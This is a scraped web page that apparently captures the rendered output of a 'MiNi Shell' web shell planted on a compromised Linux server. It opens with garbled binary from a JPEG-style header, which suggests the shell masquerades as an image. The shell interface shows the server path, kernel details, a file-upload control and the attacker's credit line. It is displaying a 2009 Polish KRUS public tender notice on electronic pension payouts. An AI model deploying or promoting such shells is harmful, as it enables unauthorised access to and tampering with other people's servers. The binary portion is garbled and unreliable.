JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090428/123776-N-2009.html

<p class="kh_header"><b>Koszalin: Wypłata drogą elektroniczną świadczeń emerytalno-rentowych na rachunki bankowe świadczeniobiorców w bankach, mających siedzibę na terenie Rzeczpospolitej Polskiej, 
na podstawie zbiorczego przelewu</b><br>
<b>Numer ogłoszenia: 123776 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Koszalinie , ul. Słowiańska 5, 75-846 Koszalin, woj. zachodniopomorskie, tel. 094 3427731 w. 102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krus.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wypłata drogą elektroniczną świadczeń emerytalno-rentowych na rachunki bankowe świadczeniobiorców w bankach, mających siedzibę na terenie Rzeczpospolitej Polskiej, 
na podstawie zbiorczego przelewu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa finansowa - opisana przez Zamawiającego 
jako etap drugi postępowania - polegająca na wypłacie drogą elektroniczną świadczeń emerytalno-rentowych na rachunki bankowe świadczeniobiorców w bankach, mających siedzibę na terenie Rzeczpospolitej Polskiej, na podstawie zbiorczego przelewu.
Szczegółowy opis przedmiotu zamówienia:
1.	Wypłata świadczeń na rachunki bankowe odbywać się będzie w następujących terminach: 
1)	w miesiącu czerwcu 2009 r. do 10-go, 15-go, 30-go;
2)	w pozostałych miesiącach objętych umową do 15-go dnia każdego miesiąca.
2.	Zamawiający przekazywać będzie środki niezbędne do zabezpieczenia wypłaty świadczeń emerytalno-rentowych na wskazany przez Wykonawcę rachunek bankowy nie wcześniej niż na 3 dni robocze i nie później niż na 2 dni przed terminem wypłaty.
3.	W celu realizacji zamówienia Zamawiający nie przewiduje założenia odrębnego rachunku u Wykonawcy.
4.	Zamawiający przygotowywać będzie w terminie na 4 dni robocze przed terminem wypłaty świadczeń:
1)	pliki przelewów w formie nośników magnetycznych (płyt CDR) w formacie VideoTel, z zawartością danych świadczeniobiorców, ich rachunków bankowych i kwot wypłacanych świadczeń, według których realizowane będą wypłaty;
2)	spisy przelewów w formie papierowej;
3)	protokół przekazania.
5.	Wykonawca odbierać będzie w siedzibie Zamawiającego nośniki magnetyczne (płyty CDR) i spisy przelewów w formie papierowej w terminie na 4 dni robocze przed terminem wypłaty świadczeń.
6.	Płytę CDR w zalakowanej kopercie odbierać będzie z siedziby Zamawiającego 
za pokwitowaniem osobiście upoważniony do tego pracownik Wykonawcy.
7.	Zastosowane przez Zamawiającego formaty danych elektronicznych winny być akceptowane przez Wykonawcę.
8.	Wykonawca realizować będzie wyłącznie zlecenia Zamawiającego podpisane przez osoby upoważnione do dysponowania środkami pieniężnymi.
9.	Wykonawca przekazywać będzie środki pieniężne na indywidualne rachunki bankowe świadczeniobiorców w tym samym dniu po ich przyjęciu.
10.	Wykonawca ponosić będzie pełną odpowiedzialność za przejęte zlecenia wypłat 
do wysokości środków przekazanych na jego rachunek bankowy.
11.	W przypadku niedotrzymania terminów wypłat świadczeń Wykonawca zobowiązany będzie naliczyć i wypłacić świadczeniobiorcy odsetki ustawowe za każdy dzień zwłoki. 
12.	Zwroty świadczeń wpływających na rachunek bankowy Wykonawcy (likwidacja rachunku ROR przez świadczeniobiorcę lub inne przyczyny), będą przekazane na wskazany rachunek bankowy Zamawiającego nie później niż w dniu następnym po dniu otrzymania zwrotu. Za zwroty świadczeń Wykonawca nie będzie pobierać dodatkowych opłat.
13.	Wykonawca zobowiązany będzie do wykorzystywania powierzonych przez Zamawiającego środków pieniężnych wyłącznie do realizacji przedmiotu zamówienia.
14.	W razie wypłacenia osobie nieuprawnionej Wykonawca pokrywać będzie szkodę wyrządzoną Zamawiającemu w pełnej wysokości.
15.	Szacunkowa ilość wypłacanych świadczeń w całkowitym okresie obowiązywania umowy wynosi około 257 400 szt. Ilość wypłacanych świadczeń jest wielkością szacunkową i może ulec zmianie w zależności od liczby obsługiwanych świadczeniobiorców.
16.	Zamawiający zastrzega, iż całość zamówienia z uwagi na jego specyfikę nie może być powierzona wykonaniu przez podwykonawców..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.00.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 31.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 P.z.p., tzn.:
1)	Posiadają uprawnienia do wykonywania działalności tożsamej z niniejszym zamówieniem.
2)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
na podstawie art. 24 ust. 1 i 2 P.z.p.
2.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty. Ocena spełnienia warunków zostanie dokonana według formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy załączyć następujące dokumenty:
1.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania działalności tożsamej z niniejszym zamówieniem oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 P.z.p. do oferty należy załączyć następujące dokumenty:
1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony 
nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert.
2)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego Oddziału ZUS lub KRUS potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3)	Koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem.
4)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, 
zamiast dokumentów, o których mowa w ust. 1 pkt 1 i 2 - składa dokument 
lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie 
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące 
przed upływem terminu składania ofert;
5)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa 
w ust. 1 pkt 4 zastępuje się je dokumentem zawierającym oświadczenie złożone 
przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby 
lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Wymagania określone w ust. 1 pkt 4 dotyczące okresu ważności tego dokumentu stosuje się odpowiednio. 
6)	Oświadczenie o spełnieniu warunków udziału w postępowaniu.
2.	W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia do oferty należy przedłożyć sprawozdanie finansowe za rok 2008, a jeżeli okres działalności jest krótszy - za ten okres. W przypadku gdy:
1)	sprawozdanie podlega badaniu przez biegłego rewidenta zgodnie z przepisami 
o rachunkowości, do oferty należy dołączyć opinię o jego badaniu; jeżeli na dzień składania oferty nie sporządzono sprawozdania finansowego za rok 2008, 
do oferty należy dołączyć sprawozdanie za rok 2007 również z opinią biegłego rewidenta;
2)	Wykonawca nie jest zobowiązany do sporządzenia sprawozdania finansowego,
do oferty należy dołączyć inny dokument określający obroty oraz zobowiązania 
i należności za rok 2008.

Dokumenty wymienione w ust. 1 pkt 1-5 oraz ust. 2 mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

Ponadto do oferty należy dołączyć:
3.	Wypełniony i podpisany formularz oferty.
4.	Oryginał lub kopię poświadczoną za zgodność z oryginałem przez notariusza - pełnomocnictwa (upoważnienia) do reprezentowania Wykonawcy w niniejszym postępowaniu, o ile oferta została podpisana przez osoby nie umocowane do tych czynności w dokumentach rejestracyjnych firmy. 
5.	Dopuszcza  się możliwość składania jednej oferty przez dwa lub więcej podmiotów. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania   w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
Jeżeli o zamówienie Wykonawcy ubiegają się wspólnie, każdy z nich zobowiązany 
jest złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu, 
z tymże dokumenty wymienione w ust. 1 i 2 muszą być złożone przez każdego Wykonawcę osobno, a pozostałe łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Koszalinie 
ul. Słowiańska 5, 75-846 Koszalin, pokój nr 229.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 09:00, miejsce: KRUS OR w Koszalinie, ul. Słowiańska 5, 75-846 Koszalin, pok. 106.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com